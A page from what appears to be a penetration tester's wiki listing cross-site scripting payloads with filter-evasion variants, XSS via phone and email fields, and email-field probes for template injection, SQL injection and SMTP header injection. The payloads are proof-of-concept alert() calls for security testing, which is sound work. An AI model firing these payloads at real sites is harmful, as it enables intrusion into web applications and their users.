❎
wiki.hackerlab.cz
  • About me
  • Vulnerability Assessment
  • CLOUD PENTESTING
    • AWS
    • GCP
    • Microsoft Azure
    • Labs
  • REST API - Bypasses and Privilege Escalations
  • Python Virtual Environment (VENV)
  • OSINT & Information Gathering
  • Web Pentesting
    • JavaScript .maps
    • SSRF
    • LDAP Injection
    • Django ORM Exploitation
    • HTTP Request Smuggling
    • Server Side Template Injection (SSTI)
    • Insecure Deserialization
    • Brute force
    • Shell Fu - Oneliners
    • CORS
    • Special Chars & NULL Bytes
    • XSS
    • XXE
    • Nuclei
    • SQL Injection
    • Blind SQL Injection
    • SQLmap
    • NoSQL Injection
    • CRLF Injection
    • Input Validation - Fuzz1
    • HTTP Headers - X-Forwarded
    • Log4j
    • Enumeration with Wordlists
    • Bug Bounty - Web Recon
    • HTTP Proxy Override
    • CSV Injection
    • Windows Forbidden File Names
    • Path Traversal
    • OS Command Injection
    • Open Redirect
    • JWT Tool
    • Burp Extensions - TokenJAR & ATOR
    • Upload RCE
    • GUID and UUIDs
  • Toolset
    • Git - Repo and Tools
    • Docker for Pentesters
  • Infrastructure Pentesting
    • Active Directory (AD)
      • Vulnerable Machines (labs)
      • Pass the hash
      • Azure Active Directory
      • Password Cracking
      • Domain Enumeration
      • LLMNR Poisoning with Responder
      • HTB Forest
      • LDAP
      • WinRM
      • SMB & RPC Enumeration
      • SMB Relay
      • Impacket
      • Bloodhound
      • OWA Exchange Server 2019
      • Active Directory Web Services (ADWS)
      • Active Directory Attacks
    • Mail Server Attacks
    • NFS Enumeration
    • Windows PostExploitation
      • Windows Enumeration
      • Powershell Payloads
      • Add RDP Account & Ride on Meterpreter
    • Dump File Analysis
  • Other Pentest Projects
    • Security Projects
  • WIFI Pentesting
    • Kali Linux - Alpha card AWUS 1900 (VirtualBox)
    • Active Card & Monitor Mode
    • Aircrack-ng Suite
  • Certs
    • Burp Suite Certified Practitioner
  • Linux
    • Network Manager
  • Books
    • The Hacker Playbook 3
Powered by GitBook
On this page
  • Generic
  • Phone Inputs
  • Email Inputs
  • References

Was this helpful?

  1. Web Pentesting

XSS

Cross-Site Scripting (XSS) payloads

Generic

'';! - "<XSS>=&{()}
\'-alert(1)//
\';alert(1)//
\"-alert(1)}//
alert`xss`;
'-alert(1)-'
'}alert(1);{'
'}alert(1)%0A{'
';-alert(1)//
\'}alert(1);{//
&apos;-alert(1)-&apos;
&#x27-alert(1)-&#x27
"onmouseover="alert(1)
onerror=alert`1`
param=abc`;return+false});});alert`xss`;</script>
return+false});
});
javascript:alert(1)
JavaSCript:alert(1)
javascript:%61%6c%65%72%74%28%31%29 //URL encode
javascript&colon;alert(1)
javascript&#x003A;alert(1)
javascript&#58;alert(1)
&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3aalert(1)
<script>alert(1)</script>
<script>\u0061lert(2)</script>
<script>\u{61}lert(3)</script>
<script>\u{0000000061}lert(4)</script>
<%00script>alert(5)</script>
<script>al%00ert(6)</script>
script x>
<script a="1234">
<script ~~~>
<script/random>alert(1)</script>
<script      ///Note the newline
>alert(1)</script>
<scr\x00ipt>alert(1)</scr\x00ipt>
<<script>alert("XSS");//<</script>
<img src=x onerror=alert(7) />
<img/src=x a='' onerror=alert(8)>
<img src onerror=\u0061\u006C\u0065\u0072\u0074(1) />
<img src onerror=\u{61}\u{6C}\u{65}\u{72}\u{74}(1) />
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>
<svg/onload=alert``>
<svg onload=alert('XSS')>
<svg/onload=eval(atob(β€˜YWxlcnQoJ1hTUycp’))>
<svg onload=alert(1)>
"><svg onload=alert(1)>
<svg><x><script>alert('1'&#41</x>
<svg onload%09=alert(1)> //No safari
<svg %09onload=alert(1)>
<svg %09onload%20=alert(1)>
<svg onload%09%20%28%2c%3b=alert(1)>
<iframe src="javascript:alert(1)">
{{constructor.constructor('alert(1)')()}}
{{$on.constructor('alert(1)')()}}
{{{}.")));alert(1)//"}}

Phone Inputs

10203040;𝐩𝐑𝐨𝐧𝐞-𝐜𝐨𝐧𝐭𝐞𝐱𝐭=<𝐬𝐜𝐫𝐒𝐩𝐭>𝐚π₯𝐞𝐫𝐭(1)</𝐬𝐜𝐫𝐒𝐩𝐭>

Email Inputs

test+(<script>alert(0)</script>)@example.com
test@example(<script>alert(0)</script>).com
"<script>alert(0)</script>"@example.com
"<%=7*7%>"@example.com
test+(${{7*7}})@example.com
"'OR1=1--'"@example.com
user@test.burpcollaborator.net
user@[127.0.0.1]
user@email=user@example.com
%0d%0aContent-Length:%200%0d%0a%0d%0a"@example.com
"recipient@test.com\r\nRCPT TO:<victim+"@test.com

References

PreviousSpecial Chars & NULL BytesNextXXE

Last updated 2 months ago

Was this helpful?

XSS (Cross Site Scripting)HackTricks
A Pentester’s Guide to Cross-Site Scripting (XSS) | Cobalt BlogCobalt
Logo
Logo